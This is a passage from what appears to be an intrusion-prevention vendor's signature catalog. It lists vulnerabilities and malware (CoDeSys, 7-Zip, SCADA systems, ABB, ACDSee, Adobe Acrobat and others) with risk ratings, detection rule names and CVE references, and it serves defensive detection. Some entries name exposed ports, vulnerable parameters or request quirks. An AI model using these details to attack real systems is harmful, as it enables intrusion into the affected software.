Description: There is a stack buffer overflow vulnerability in 3S Smart Software CoDeSys. The vulnerability is due to insufficient boundary checking when parsing requests and allows overflowing a stack buffer with an overly long string. A remote unauthenticated attacker could exploit this vulnerability by sending crafted requests to the vulnerable service on ports 1211/TCP and 1210/TCP. Successful exploitation could result in code execution with SYSTEM privileges. Unsuccessful attack attempts could cause the affected service to terminate abnormally, causing a denial of service (DoS) condition.
Situation: Generic_CS-Smart-Software-Solutions-Codesys-Gateway-Stack-Buffer-Overflow
References:
CVE-2012-4708
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4708
OSVDB-90371
http://www.osvdb.org/90371
Back to top

427BB-Authentication-Bypass

About this vulnerability: A 427BB Authentication Bypass vulnerability
Risk: High
First detected in: sgpkg-ips-788-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: 427BB
Type: Insecure Configuration
Description: A vulnerability in 427BB, versions 2.2 and 2.2.1, which allows remote attackers to bypass authentication by using a valid username, usertype, and setting the authenticated cookie.
Situation: HTTP_CSH-427BB-Authentication-Bypass
References:
CVE-2006-0153
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0153
BID-16178
http://www.securityfocus.com/bid/16178
OSVDB-22274
http://www.osvdb.org/22274
Back to top

4Shared-File-Sharing-Service

About this vulnerability: 4Shared-File-Sharing-Service
Risk: Low
First detected in: sgpkg-ips-211-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: 4Shared
Type: Browser
Description: 4Shared is an online file sharing service.
Situation: HTTP_CSH-4Shared-Access
Back to top

7-Zip-7z-File-Ppmd-Properties-Parsing-Integer-Underflow-Vulnerability

About this vulnerability: A vulnerability in 7-Zip
Risk: High
First detected in: sgpkg-ips-1681-5242
Last changed: sgpkg-ips-1681-5242
Platform: Generic
Software: 7-Zip
Type: Integer Overflow
Description: A remote code execution vulnerability has been reported for 7-Zip. The vulnerability is due to a lack of proper input validation when parsing 7Z files. A remote attacker can exploit the vulnerability by enticing a victim to open a maliciously crafted file. Successfully exploiting the vulnerability could result in remote code execution in the context of the application.
Situation: File-Binary_7-Zip-7z-File-Ppmd-Properties-Parsing-Integer-Underflow-Vulnerability
References:
CVE-2023-31102
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-31102
Back to top

7-Zip-Rar-Solid-Compression-Remote-Code-Execution

About this vulnerability: A vulnerability in 7-Zip RAR
Risk: High
First detected in: sgpkg-ips-1150-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: 7-Zip
Type: Malfunction
Description: A vulnerability in 7-Zip RAR, versions prior to 18.05, which allows remote attackers to execute arbitrary code by sending the victim a malicious file due to the improper handling of solid compression.
Situation: File-Binary_HPE-7-Zip-Rar-Solid-Compression-Remote-Code-Execution
References:
CVE-2018-10115
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10115
Back to top

7-Zip-Squashfs-File-Uidtable-Parsing-Buffer-Overflow-Vulnerability

About this vulnerability: A vulnerability in 7-Zip
Risk: High
First detected in: sgpkg-ips-1641-5242
Last changed: sgpkg-ips-1641-5242
Platform: Generic
Software: 7-Zip
Type: Buffer Overflow
Description: A remote code execution vulnerability has been reported for 7-Zip. The vulnerability is due to a lack of proper input validation when parsing SquashFS files. A remote attacker can exploit the vulnerability by enticing a victim to open a maliciously crafted file.
Situation: File-Binary_7-Zip-Squashfs-File-Uidtable-Parsing-Buffer-Overflow-Vulnerability
References:
CVE-2023-40481
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-40481
Back to top

7-Zip-Zstandard-Decompression-Integer-Underflow-CVE-2024-11477

About this vulnerability: A vulnerability in 7-Zip
Risk: High
First detected in: sgpkg-ips-1858-5242
Last changed: sgpkg-ips-1858-5242
Platform: Generic
Software: 7-Zip
Type: Integer Overflow
Description: An integer underflow vulnerability has been reported for 7-Zip. The vulnerability is due to a lack of proper input validation of literals length codes, offset codes, and match length codes when decompressing Zstandard compressed archives. A remote attacker can exploit the vulnerability by enticing a victim to open a maliciously crafted file. Successfully exploiting the vulnerability could result in denial of service, or in the worst case, remote code execution in the context of the application.
Situation: File-Binary_7-Zip-Zstandard-Decompression-Integer-Underflow-CVE-2024-11477
References:
CVE-2024-11477
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-11477
Back to top

7t-Interactive-Graphical-SCADA-Arbitrary-File-Execution

About this vulnerability: An attempt to exploit a vulnerability in 7T Interactive Graphical SCADA System
Risk: Moderate
First detected in: sgpkg-ips-394-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: 7T Interactive Graphical SCADA System
Type: Malfunction
Description: An arbitrary file execution through directory traversal vulnerability exists in 7-Technologies's Interactive Graphical SCADA System (IGSS). The flaw is due to lack of input sanitation while handling requests sent to the server. Remote, unauthenticated attackers could exploit this vulnerability via sending a specially crafted packet to TCP port 12397 on the target server.
Situation: Generic_CS-7t-Interactive-Graphical-SCADA-Arbitrary-File-Execution
References:
CVE-2011-1566
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1566
BID-46936
http://www.securityfocus.com/bid/46936
OSVDB-72349
http://www.osvdb.org/72349
Back to top

7t-Interactive-Graphical-SCADA-Arbitrary-File-Read-And-Overwrite

About this vulnerability: An attempt to exploit a vulnerability in 7T Interactive Graphical SCADA System
Risk: Moderate
First detected in: sgpkg-ips-394-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: 7T Interactive Graphical SCADA System
Type: Malfunction
Description: A directory traversal vulnerability exists in 7T Interactive Graphical SCADA System (IGSS). The flaw is due to lack of input sanitation while handling requests sent to the server. Remote, unauthenticated attackers could exploit this vulnerability via sending a specially crafted packet to TCP port 12401 on the target.
Situation: Generic_CS-7t-Interactive-Graphical-SCADA-Arbitrary-File-Read-And-Overwrite
References:
CVE-2011-1565
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1565
BID-46936
http://www.securityfocus.com/bid/46936
OSVDB-72354
http://www.osvdb.org/72354
Back to top

7t-Interactive-Graphical-SCADA-DoS

About this vulnerability: A 7t Interactive Graphical SCADA vulnerability
Risk: Moderate
First detected in: sgpkg-ips-785-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: 7T Interactive Graphical SCADA System
Type: Configuration Error
Description: A vulnerability in 7T Interactive Graphical SCADA System, version 9.0.0.11200, which allows remote attackers to cause a denial of service condition via a crafted packet to TCP port 12401.
Situation: Generic_CS-7t-Interactive-Graphical-SCADA-File-Operations-Buffer-Overflows
References:
CVE-2011-4050
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4050
OSVDB-77976
http://www.osvdb.org/77976
Back to top

7t-Interactive-Graphical-SCADA-File-Operations-Buffer-Overflows

About this vulnerability: A vulnerability in 7T Interactive Graphical SCADA System
Risk: Moderate
First detected in: sgpkg-ips-393-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: 7T Interactive Graphical SCADA System
Type: Buffer Overflow
Description: Multiple overflow vulnerabilities exist in 7T Interactive Graphical SCADA System (IGSS) that could be exploited by remote attackers to compromise a vulnerable system. The flaw is due to boundary errors in the handling of file operation requests sent to the server. Remote, unauthenticated attackers could exploit this vulnerability by sending a specially crafted packet to TCP port 12401 on the target. Successful exploitation would cause stack buffer overflows that could cause the host to become unresponsive, and may lead to code injection and execution in the context of the affected server, normally Administrator on Windows systems.
Situation: Generic_CS-7t-Interactive-Graphical-SCADA-File-Operations-Buffer-Overflows
References:
CVE-2011-1567
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1567
BID-46936
http://www.securityfocus.com/bid/46936
Back to top

A-PDF-WAV-To-MP3-Buffer-Overflow

About this vulnerability: An A-PDF WAV To MP3 Buffer Overflow vulnerability
Risk: High
First detected in: sgpkg-ips-797-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: A-PDF
Type: Buffer Overflow
Description: A buffer overflow vulnerability in A-PDF WAV to MP3, version 1.0.0, which allows remote attackers to execute arbitrary code via a specially crafted m3u file.
References:
BID-14676
http://www.securityfocus.com/bid/14676
OSVDB-67241
http://www.osvdb.org/67241
Back to top

Ababil-Trojan

About this vulnerability: Ababil Trojan
Risk: High
First detected in: sgpkg-ips-618-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: Ababil is a Trojan. An infected machine is remotely used by an attacker to perform attacks, such as DDOS attacks.
Situation: HTTP_CSU-Ababil-Trojan-Activity-Detected
Back to top

ABB-Microscada-Wserver-Command-Execution

About this vulnerability: A vulnerability in ABB MicroSCADA
Risk: High
First detected in: sgpkg-ips-556-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ABB MicroSCADA
Type: Malfunction
Description: A command execution vulnerability exists in the Wserver component of ABB MicroSCADA. The vulnerability is because user controlled data is passed as command line arguments to the "CreateProcessA()" function enabling arbitrary command execution without access control. A remote unauthenticated attacker can exploit this vulnerability by sending requests with the "execute" Opcode to the vulnerable service. Successful exploitation could lead to arbitrary command execution in the context of the Wserver process.
Situation: Generic_CS-ABB-Microscada-Wserver-Multiple-Vulnerabilities-2
Generic_CS-ABB-Microscada-Wserver-Multiple-Vulnerabilities
References:
OSVDB-100324
http://www.osvdb.org/100324
Back to top

ABB-Microscada-Wserver-Multiple-Buffer-Overflows

About this vulnerability: A vulnerability in ABB MicroSCADA
Risk: Moderate
First detected in: sgpkg-ips-558-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ABB MicroSCADA
Type: Buffer Overflow
Description: There are multiple Buffer Overflow vulnerabilities in the Wserver component of ABB MicroSCADA. The vulnerabilities are because user controlled data is copied to stack-based buffers without verification of the size. It may enable arbitrary code execution. A remote unauthenticated attacker can exploit this vulnerability by sending requests with a malicious parameter to the vulnerable service. Successful exploitation could lead to arbitrary code execution in the context of the Wserver process.
Situation: Generic_CS-ABB-Microscada-Wserver-Multiple-Vulnerabilities-2
Generic_CS-ABB-Microscada-Wserver-Multiple-Vulnerabilities
References:
OSVDB-100323
http://www.osvdb.org/100323
Back to top

ABB-Multiple-Products-Robnetscanhost.exe-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in ABB ABB Interlink Module
Risk: Moderate
First detected in: sgpkg-ips-444-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ABB Robot Communications Runtime
Type: Buffer Overflow
Description: There is a stack buffer overflow in a component of the ABB Robot Communication Runtime used on Windows. The vulnerability exists in the RobNetScanHost service and is due to improper parsing of 'Netscan' packets with opcodes 0A or 0E sent to the service. A remote unauthenticated attacker can exploit this vulnerability by sending specially crafted packets to the vulnerable service. A successful attack may allow remote unauthenticated attackers to execute arbitrary code on the target machine within the security context of the service. If such an attack is not executed successfully, the vulnerable server may terminate abnormally.
Situation: Generic_UDP_ABB-Multiple-Products-Robnetscanhost.exe-Stack-Buffer-Overflow
References:
CVE-2012-0245
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0245
BID-52123
http://www.securityfocus.com/bid/52123
OSVDB-79476
http://www.osvdb.org/79476
Back to top

ABB-Panel-Builder-800-Comli-Commandlineoptions-Stack-Based-Buffer-Overflow

About this vulnerability: A vulnerability in ABB Panel Builder 800
Risk: Moderate
First detected in: sgpkg-ips-1103-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ABB Panel Builder 800
Type: Buffer Overflow
Description: There has been reported a stack-based buffer overflow in ABB Panel Builder 800. Successful exploitation could result in arbitrary code execution.
Situation: File-Text_ABB-Panel-Builder-800-Comli-Commandlineoptions-Stack-Based-Buffer-Overflow
References:
CVE-2018-10616
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10616
Back to top

ABB-Pb610-Panel-Builder-600-Idal-HTTP-Host-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in ABB PB610 Panel Builder 600
Risk: Moderate
First detected in: sgpkg-ips-1183-5242
Last changed: sgpkg-ips-1469-5242
Platform: Generic
Software: ABB Panel Builder
Type: Input Validation
Description: There exists a stack buffer overflow vulnerability in ABB PB610 Panel Builder 600. Successful exploitation could lead in arbitrary code execution.
Situation: HTTP_CSH-Oversized-Host-Header-Field
References:
CVE-2019-7232
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7232
Back to top

ABB-Test-Signal-Viewer-Cwgraph3d-ActiveX-Arbitrary-File-Creation

About this vulnerability: A vulnerability in ABB Test Signal Viewer
Risk: Moderate
First detected in: sgpkg-ips-554-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ABB Test Signal Viewer; ABB RobotWare
Type: Directory Traversal
Description: An arbitrary file writing vulnerability exists in ABB Test Signal Viewer. The vulnerability is due to a directory traversal error in the exposed insecure method ExportStyle by the included CWGraph3D (cw3dgrph.ocx) ActiveX control. An attacker could exploit this vulnerability by enticing the target user to open a malicious web page or to view a malicious document. Successful exploitation would allow an attacker to create arbitrary files with attacker-controlled contents on the target machine.
Situation: File-Text_ABB-Test-Signal-Viewer-Cwgraph3d-ActiveX-Arbitrary-File-Creation
References:
CVE-2013-5022
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5022
OSVDB-96160
http://www.osvdb.org/96160
Back to top

ABetterInternet

About this vulnerability: ABetterInternet browser plugin
Risk: Low
First detected in: sgpkg-ips-33-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: ABetterInternet
Type: Insecure Configuration
Description: ABetterInternet is a browser plugin for Internet Explorer. Some organizations may consider this unwanted software. This plugin displays advertisement popups and/or sends information about the browsing habits of its user. It may even install third party software and can update itself without user action.
Situation: HTTP_CSH-ABetterInternet
HTTP_CSH-Transponder
Back to top

ABUS-TVIP-20000-21150-Security-Camera-Command-Injection-CVE-2023-26609

About this vulnerability: A vulnerability in ABUS TVIP 20000-21150 security cameras
Risk: High
First detected in: sgpkg-ips-1658-5242
Last changed: sgpkg-ips-1658-5242
Platform: Generic
Software: ABUS TVIP
Type: Input Validation
Description: A command injection vulnerability has been reported in ABUS TVIP 20000-21150 security cameras. A remote attacker can exploit this vulnerability to execute arbitrary commands via shell metacharacters in the value of the ap parameter.
Situation: HTTP_CRL-ABUS-TVIP-20000-21150-Security-Camera-Command-Injection-CVE-2023-26609
References:
CVE-2023-26609
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-26609
Back to top

ABUS-TVIP-20000-21150-Security-Camera-Local-File-Inclusion

About this vulnerability: A vulnerability in ABUS TVIP 20000-21150 security cameras
Risk: High
First detected in: sgpkg-ips-1658-5242
Last changed: sgpkg-ips-1658-5242
Platform: Generic
Software: ABUS TVIP
Type: Malfunction
Description: A local file inclusion vulnerability has been reported in ABUS TVIP 20000-21150 security cameras. A remote attacker can exploit this vulnerability to read any file on the system, which may reveal passwords and other sensitive information.
Situation: HTTP_CSU-ABUS-TVIP-20000-21150-Security-Camera-Local-File-Inclusion
Back to top

Abyss-Web-Server-HTTP-Get-BOF

About this vulnerability: Heap overrun vulnerability in Abyss web server
Risk: High
First detected in: sgpkg-ips-14-1102
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Abyss Web Server
Type: Buffer Overflow
Description: Abyss Web Server is vulnerable to a heap buffer overflow. By sending a specially-crafted HTTP GET request appended with a colon and a backslash (:\) character a remote attacker can overflow a buffer and execute arbitrary code on the system with privileges of the Abyss Web Server user.
Situation: HTTP_CSU-Abyss-Web-Server-HTTP-Get-BOF
References:
BID-8062
http://www.securityfocus.com/bid/8062
Back to top

Accellion-FTA-oauth_token-Remote-Command-Execution

About this vulnerability: Accellion FTA oauth_token Remote Command Execution vulnerability.
Risk: High
First detected in: sgpkg-ips-685-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Accellion
Type: Script Injection
Description: A remote shell command execution vulnerability exists in Accellion, versions FTA_9_11_200 and before, that allows for remote command execution due to insufficient sanitization of the 'oauth_token' parameter.
Situation: HTTP_CRL-Accellion-FTA-oauth_token-Remote-Command-Execution
References:
CVE-2015-2857
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2857
Back to top

Accellion-FTA-statecode-Cookie-Remote-File-Disclosure

About this vulnerability: Accellion FTA statecode Cookie Remote File Disclosure vulnerability.
Risk: High
First detected in: sgpkg-ips-685-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Accellion
Type: Input Validation
Description: A remote file disclosure vulnerability exists in Accellion, versions FTA_9_11_200 and before, that allows remote attackers to disclose the contents of any file readable by the webserver, due to the insufficient sanitization of the 'statecode' cookie.
Situation: HTTP_CS-Accellion-FTA-statecode-Cookie-Remote-File-Disclosure
References:
CVE-2015-2856
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2856
Back to top

ACDSee-Products-XPM-Values-Section-Buffer-Overflow

About this vulnerability: A vulnerability in ACDSee Systems ACDSee Photo Editor
Risk: Moderate
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ACDSee
Type: Buffer Overflow
Description: There exists a buffer overflow vulnerability in multiple ACDSee products. The flaw is due to a boundary error when processing crafted XPM files. A remote attacker can exploit this vulnerability by persuading the target user to open a malicious XPM file with the affected application. Successful attack could allow for arbitrary code being injected and executed with the privileges of the currently logged on user. In an attack where code injection is successful, the behaviour of the target host is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the currently logged in user. In an attack case where code injection is not successful, the vulnerable application will terminate abnormally.
Situation: File-TextId_ACDSee-Products-XPM-Values-Section-Buffer-Overflow
References:
CVE-2007-6009
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6009
BID-26554
http://www.securityfocus.com/bid/26554
OSVDB-45278
http://www.osvdb.org/45278
Back to top

ACDSee-XBM-Header-Name-Buffer-Overflow

About this vulnerability: A vulnerability in ACD Systems ACDSee Photo Editor
Risk: High
First detected in: sgpkg-ips-274-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: ACDSee Photo Editor; ACDSee
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in various applications in the ACDSee product family. The flaw is due to a boundary error when processing crafted X Bitmap Graphic (XBM) files. A remote unauthenticated attacker can exploit this vulnerability by persuading the target user to open a malicious XBM file with the affected application. A successful attack allows arbitrary code injection and execution with the privileges of the currently logged on user.
Situation: HTTP_SS-ACDSee-XBM-Header-Name-Buffer-Overflow
File-TextId_ACDSee-XBM-Header-Name-Buffer-Overflow
Back to top

ACDSee-XPM-File-Handling-Buffer-Overflow

About this vulnerability: A vulnerability in XPM file parsing in ACDSee
Risk: High
First detected in: sgpkg-ips-108-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: ACDSee; ACDSee Photo Editor; ACDSee Pro
Type: Buffer Overflow
Description: There is a stack buffer overflow vulnerability in ACD Systems' ACDSee products. The vulnerability is due to improper boundary validation when processing XPM images. The flaw can be leveraged remotely to execute arbitrary code under the context of the currently logged-in user.
Situation: HTTP_ACDSee-XPM-File-Handling-Buffer-Overflow
File-TextId_ACDSee-XPM-File-Handling-Buffer-Overflow
References:
CVE-2007-2193
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2193
BID-23620
http://www.securityfocus.com/bid/23620
OSVDB-35236
http://www.osvdb.org/35236
Back to top

ACGVclick-Php-Remote-File-Include-Vulnerability

About this vulnerability: ACGVclick Remote File Include Vulnerability
Risk: High
First detected in: sgpkg-ips-343-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ACGVclick
Type: Input Validation
Description: The ACGVclick is prone to a remote file-include vulnerability. Successful exploitation of the issue allows the attacker to compromise the application and the remote system.
Situation: HTTP_CRL-ACGVclick-Remote-Code-Injection-Compromise
References:
CVE-2007-0577
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0577
BID-22278
http://www.securityfocus.com/bid/22278
OSVDB-33002
http://www.osvdb.org/33002
Back to top

Acquia-Mautic-Tracking-Pixel-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in Mautic.
Risk: High
First detected in: sgpkg-ips-1479-5242
Last changed: sgpkg-ips-1479-5242
Platform: Generic
Software: Mautic
Type: Input Validation
Description: A vulnerability in Mautic, versions prior to 4.3.0, which allows remote attackers to execute arbitrary scripts, due to the improper sanitization of user metadata collected from tracking pixels.
Situation: HTTP_CS-Acquia-Mautic-Tracking-Pixel-Stored-Cross-Site-Scripting
References:
CVE-2022-25772
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-25772
Back to top

Acrobat-Reader-eBook-Plug-In-Format-String

About this vulnerability: A vulnerability in Acrobat Reader
Risk: High
First detected in: sgpkg-ips-410-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Acrobat
Type: Format String
Description: A vulnerability exists within the EBX Transfer Data (ETD) file parser of the eBook plug-in component of Adobe Acrobat Reader. The ETD file parser contains a flaw where user input can be used as the format string in an output function, potentially causing memory corruption. This vulnerability can be leveraged by an attacker to remotely inject and execute code on a target system with the privileges of the currently logged in user.
Situation: File-TextId_Acrobat-Reader-eBook-Plug-In-Format-String
References:
CVE-2004-1153
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1153
BID-11934
http://www.securityfocus.com/bid/11934
Back to top

Acronis-Cyber-Infrastructure-Default-Password-RCE

About this vulnerability: A vulnerability in Acronis Cyber Infrastructure
Risk: High
First detected in: sgpkg-ips-1808-5242
Last changed: sgpkg-ips-1808-5242
Platform: Unix; Linux
Software: Acronis Cyber Infrastructure
Type: Insecure Configuration
Description: A vulnerability in Acronis Cyber Infrastructure, multiple versions, which allows remote attackers to execute arbitrary code by use of default passwords.
Situation: Generic_CS-Acronis-Cyber-Infrastructure-Default-Password-RCE
References:
CVE-2023-45249
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-45249
Back to top

Acronis-Cyber-Protect-Backup-Remote-Code-Execution

About this vulnerability: A vulnerability in Acronis Cyber Protect or Backup
Risk: High
First detected in: sgpkg-ips-1808-5242
Last changed: sgpkg-ips-1808-5242
Platform: Linux; Windows
Software: Acronis Cyber Protect or Backup
Type: Input Validation
Description: A vulnerability in ronis Cyber Protect or Backup, versions Acronis Cyber Protect 15 before 29486, and Backup 12.5 before 16545, which allows remote attackers to attain bearer tokens through anonymous registration of new protect/backup agents on new endpoints, which can be used in the web console, allowing the ability for remote code execution.
Situation: HTTP_CRL-Acronis-Cyber-Protect-Backup-Remote-Code-Execution
References:
CVE-2022-3405
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3405
Back to top

ACTi-ASOC-2200-Web-Configurator-Remote-Root-Command-Execution

About this vulnerability: A vulnerability in ACTi ASOC 2200 Web Configurator
Risk: High
First detected in: sgpkg-ips-607-5211
Last changed: sgpkg-ips-1639-5242
Platform: Generic
Software: ACTi ASOC 2200 Web Configurator
Type: Malfunction
Description: There is a remote root command execution vulnerability in ACTi ASOC 2200 Web Configurator.
Situation: HTTP_CSU-Potential-System-File-Disclosure
HTTP_CSU-Suspected-System-File-Disclosure
Back to top

Actionscript-Security-Bypass-Vulnerability-CVE-2016-4139

About this vulnerability: A vulnerability in Adobe Flash
Risk: Moderate
First detected in: sgpkg-ips-772-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Adobe Flash Player
Type: Malfunction
Description: There exists a vulnerability in ActionScript.
Situation: File-Text_Actionscript-Security-Bypass-Vulnerability-CVE-2016-4139
References:
CVE-2016-4139
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4139
Back to top

Active-Collab-Remote-PHP-Code-Injection

About this vulnerability: An Active Collab Remote PHP Code Injection vulnerability.
Risk: High
First detected in: sgpkg-ips-702-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Active Collab
Type: Input Validation
Description: A vulnerability in Active Collab, versions 2.3.8 and earlier, that allows remote attackers to inject and execute PHP code due to the lack of user input validation.
Situation: HTTP_CRL-Active-Collab-Remote-PHP-Code-Injection
References:
CVE-2012-6554
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-6554
BID-53624
http://www.securityfocus.com/bid/53624
OSVDB-81966
http://www.osvdb.org/81966
Back to top

ActiveX-Object-Obfuscated-Content

About this vulnerability: An attempt to exploit a vulnerability in Internet Explorer via ActiveX Object Obfuscated Content detected.
Risk: High
First detected in: sgpkg-ips-694-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Browser
Description: A vulnerability with Internet Explorer has been detected within obfuscated ActiveX content.
Situation: File-Text_ActiveX-Object-Obfuscated-Content
Back to top

Actualscripts-Actualanalyzer-Cookie-Command-Execution

About this vulnerability: A vulnerability in ActualScripts ActualAnalyzer Lite
Risk: High
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ActualScripts ActualAnalyzer Lite
Type: Input Validation
Description: A command execution vulnerability exists in ActualAnalyzer. The vulnerability is due to insufficient input validation when handling cookie values. The cookie values can be passed to a PHP eval() function which can allow command execution. A remote unauthenticated attacker can exploit this vulnerability by sending an HTTP request with a crafted cookie value. Successful exploitation could result in command execution on the operating system from which the application is being run.
Situation: HTTP_CSH-Actualscripts-Actualanalyzer-Cookie-Command-Execution
References:
OSVDB-110601
http://www.osvdb.org/110601
Back to top

ActXax-Raw-Server-Buffer-Overflow

About this vulnerability: A vulnerability in ActFax ActFax Server
Risk: Moderate
First detected in: sgpkg-ips-520-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ActFax Server
Type: Buffer Overflow
Description: There are multiple buffer overflow vulnerabilities in ActFax RAW Server. These vulnerabilities are caused by insufficient bounds checking while processing certain fields. By sending crafted messages to the target server, a remote unauthenticated attacker can exploit these vulnerabilities to execute arbitrary code with the privileges of the vulnerable server. If code execution is unsuccessful, the service may terminate abnormally.
Situation: Generic_CS-ActFax-Raw-Server-Buffer-Overflow
References:
BID-57789
http://www.securityfocus.com/bid/57789
OSVDB-89944
http://www.osvdb.org/89944
Back to top

Acunetix-Vulnerability-Scanner-Usage

About this vulnerability: Detects vulnerability scanner usage
Risk: Moderate
First detected in: sgpkg-ips-481-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Insecure Configuration
Description: Acunetix vulnerability scanner usage was detected
Situation: HTTP_CSH-Acunetix-Vulnerability-Scanner-Usage
Back to top

Adbopebot-Trojan

About this vulnerability: Adbopebot Trojan
Risk: High
First detected in: sgpkg-ips-1355-5242
Last changed: sgpkg-ips-1355-5242
Platform: Linux
Software: <os>
Type: Code Injection
Description: Adbopebot is a trojan that affects ARM architecture Android/Linux systems.
Situation: Generic_CS-Adbopebot-Trojan
Back to top

Adload-Command-And-Control-Traffic

About this vulnerability: AdLoad command and control traffic
Risk: High
First detected in: sgpkg-ips-1622-5242
Last changed: sgpkg-ips-1622-5242
Platform: Mac OS
Software: <os>
Type: Backdoor
Description: AdLoad is a macOS malware with capabilities to deliver further malicious payloads.
Situation: HTTP_CSH-Adload-Command-And-Control-Traffic
Back to top

Adminer-Remote-Arbitrary-File-Read-CVE-2021-43008

About this vulnerability: An attempt to exploit a vulnerability in Adminer detected
Risk: High
First detected in: sgpkg-ips-1842-5242
Last changed: sgpkg-ips-1842-5242
Platform: Generic
Software: Adminer
Type: Input Validation
Description: Improper access control in Adminer versions 1.12.0 to 4.6.2 allows an attacker to achieve arbitrary file read on the server by requesting the Adminer to connect to a remote MySQL database controlled by the attacker.
Situation: HTTP_CRL-Adminer-Remote-Arbitrary-File-Read-CVE-2021-43008
References:
CVE-2021-43008
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43008
Back to top

Adobe-Acrobat--Embedded-JBIG2-Stream-Buffer-Overflow

About this vulnerability: A buffer overflow vulnerability in Adobe Systems Acrobat
Risk: High
First detected in: sgpkg-ips-209-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Acrobat; Adobe Reader
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Adobe Reader and Adobe Acrobat. The vulnerability is due to insufficient input validation when processing embedded JBIG2 streams. A remote attacker can exploit this vulnerability by enticing the target user to open malicious PDF files, and it may lead to arbitary code execution in the context of the current user.
Situation: HTTP_SS-Adobe-Acrobat-Embedded-JBIG2-Stream-Buffer-Overflow
HTTP_SS-Adobe-Acrobat-Embedded-JBIG2-Stream-Buffer-Overflow-2
File-PDF_Adobe-Acrobat-Embedded-JBIG2-Stream-Buffer-Overflow
File-PDF_Adobe-Acrobat-Embedded-JBIG2-Stream-Buffer-Overflow-2
References:
CVE-2009-0658
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0658
BID-33751
http://www.securityfocus.com/bid/33751
OSVDB-52073
http://www.osvdb.org/52073
Back to top

Adobe-Acrobat-And-Acrobat-Reader-Dc-Acroform-Addfield-Use-After-Free

About this vulnerability: A vulnerability in Adobe Systems Acrobat Reader
Risk: High
First detected in: sgpkg-ips-1370-5242
Last changed: sgpkg-ips-1370-5242
Platform: Generic
Software: Adobe Acrobat; Adobe Reader
Type: Malfunction
Description: A use-after-free vulnerability has been reported in Adobe Acrobat and Acrobat Reader DC. The vulnerability is due to improper handling of exceptions during a call to the JavaScript addField method. A remote attacker can exploit this vulnerability by enticing a target user into opening a crafted PDF file. Successful exploitation could result in the execution of arbitrary code under the security context of the target user.
Situation: File-PDF_Adobe-Acrobat-And-Acrobat-Reader-Dc-Acroform-Addfield-Use-After-Free
References:
CVE-2021-28635
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28635
Back to top

